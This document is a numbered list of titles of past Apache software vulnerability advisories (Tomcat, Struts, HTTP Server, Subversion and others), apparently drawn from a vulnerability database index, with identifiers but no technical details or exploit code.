11437| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
11438| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
11439| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
11440| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
11441| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
11442| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
11443| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
11444| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
11445| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
11446| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
11447| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
11448| [59670] Apache VCL Multiple Input Validation Vulnerabilities
11449| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
11450| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
11451| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
11452| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
11453| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
11454| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
11455| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
11456| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
11457| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
11458| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
11459| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
11460| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
11461| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
11462| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
11463| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
11464| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
11465| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
11466| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
11467| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
11468| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
11469| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
11470| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
11471| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
11472| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
11473| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
11474| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
11475| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
11476| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
11477| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
11478| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
11479| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
11480| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
11481| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
11482| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
11483| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
11484| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
11485| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
11486| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
11487| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
11488| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
11489| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
11490| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
11491| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
11492| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
11493| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
11494| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
11495| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
11496| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
11497| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
11498| [54798] Apache Libcloud Man In The Middle Vulnerability
11499| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
11500| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
11501| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
11502| [54189] Apache Roller Cross Site Request Forgery Vulnerability
11503| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
11504| [53880] Apache CXF Child Policies Security Bypass Vulnerability
11505| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
11506| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
11507| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
11508| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
11509| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
11510| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
11511| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
11512| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
11513| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
11514| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
11515| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
11516| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
11517| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
11518| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
11519| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
11520| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
11521| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
11522| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
11523| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
11524| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
11525| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
11526| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
11527| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
11528| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
11529| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
11530| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
11531| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
11532| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
11533| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
11534| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
11535| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
11536| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
11537| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
11538| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
11539| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
11540| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
11541| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
11542| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
11543| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
11544| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
11545| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
11546| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
11547| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
11548| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
11549| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
11550| [49290] Apache Wicket Cross Site Scripting Vulnerability
11551| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
11552| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
11553| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
11554| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
11555| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
11556| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
11557| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
11558| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
11559| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
11560| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
11561| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
11562| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
11563| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
11564| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
11565| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
11566| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
11567| [46953] Apache MPM-ITK Module Security Weakness
11568| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
11569| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
11570| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
11571| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
11572| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
11573| [46166] Apache Tomcat JVM Denial of Service Vulnerability
11574| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
11575| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
11576| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
11577| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
11578| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
11579| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
11580| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
11581| [44616] Apache Shiro Directory Traversal Vulnerability
11582| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
11583| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
11584| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
11585| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
11586| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
11587| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
11588| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
11589| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
11590| [42492] Apache CXF XML DTD Processing Security Vulnerability
11591| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
11592| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
11593| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
11594| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
11595| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
11596| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
11597| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
11598| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
11599| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
11600| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
11601| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
11602| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
11603| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
11604| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
11605| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
11606| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
11607| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
11608| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
11609| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
11610| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
11611| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
11612| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
11613| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
11614| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
11615| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
11616| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
11617| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
11618| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
11619| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
11620| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
11621| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
11622| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
11623| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
11624| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
11625| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
11626| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
11627| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
11628| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
11629| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
11630| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
11631| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
11632| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
11633| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
11634| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
11635| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
11636| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
11637| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
11638| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
11639| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
11640| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
11641| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
11642| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
11643| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
11644| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
11645| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
11646| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
11647| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
11648| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
11649| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
11650| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
11651| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
11652| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
11653| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
11654| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
11655| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
11656| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
11657| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
11658| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
11659| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
11660| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
11661| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
11662| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
11663| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
11664| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
11665| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
11666| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
11667| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
11668| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
11669| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
11670| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
11671| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
11672| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
11673| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
11674| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
11675| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
11676| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
11677| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
11678| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
11679| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
11680| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
11681| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
11682| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
11683| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
11684| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
11685| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
11686| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
11687| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
11688| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
11689| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
11690| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
11691| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
11692| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
11693| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
11694| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
11695| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
11696| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
11697| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
11698| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
11699| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
11700| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
11701| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
11702| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
11703| [20527] Apache Mod_TCL Remote Format String Vulnerability
11704| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
11705| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
11706| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
11707| [19106] Apache Tomcat Information Disclosure Vulnerability
11708| [18138] Apache James SMTP Denial Of Service Vulnerability
11709| [17342] Apache Struts Multiple Remote Vulnerabilities
11710| [17095] Apache Log4Net Denial Of Service Vulnerability
11711| [16916] Apache mod_python FileSession Code Execution Vulnerability
11712| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
11713| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
11714| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
11715| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
11716| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
11717| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
11718| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
11719| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
11720| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
11721| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
11722| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
11723| [15177] PHP Apache 2 Local Denial of Service Vulnerability
11724| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
11725| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
11726| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
11727| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
11728| [14106] Apache HTTP Request Smuggling Vulnerability
11729| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
11730| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
11731| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
11732| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
11733| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
11734| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
11735| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
11736| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
11737| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
11738| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
11739| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
11740| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
11741| [11471] Apache mod_include Local Buffer Overflow Vulnerability
11742| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
11743| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
11744| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
11745| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
11746| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
11747| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
11748| [11094] Apache mod_ssl Denial Of Service Vulnerability
11749| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
11750| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
11751| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
11752| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
11753| [10478] ClueCentral Apache Suexec Patch Security Weakness
11754| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
11755| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
11756| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
11757| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
11758| [9921] Apache Connection Blocking Denial Of Service Vulnerability
11759| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
11760| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
11761| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
11762| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
11763| [9733] Apache Cygwin Directory Traversal Vulnerability
11764| [9599] Apache mod_php Global Variables Information Disclosure Weakness
11765| [9590] Apache-SSL Client Certificate Forging Vulnerability
11766| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
11767| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
11768| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
11769| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
11770| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
11771| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
11772| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
11773| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
11774| [8898] Red Hat Apache Directory Index Default Configuration Error
11775| [8883] Apache Cocoon Directory Traversal Vulnerability
11776| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
11777| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
11778| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
11779| [8707] Apache htpasswd Password Entropy Weakness
11780| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
11781| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
11782| [8226] Apache HTTP Server Multiple Vulnerabilities
11783| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
11784| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
11785| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
11786| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
11787| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
11788| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
11789| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
11790| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
11791| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
11792| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
11793| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
11794| [7255] Apache Web Server File Descriptor Leakage Vulnerability
11795| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
11796| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
11797| [6939] Apache Web Server ETag Header Information Disclosure Weakness
11798| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
11799| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
11800| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
11801| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
11802| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
11803| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
11804| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
11805| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
11806| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
11807| [6117] Apache mod_php File Descriptor Leakage Vulnerability
11808| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
11809| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
11810| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
11811| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
11812| [5992] Apache HTDigest Insecure Temporary File Vulnerability
11813| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
11814| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
11815| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
11816| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
11817| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
11818| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
11819| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
11820| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
11821| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
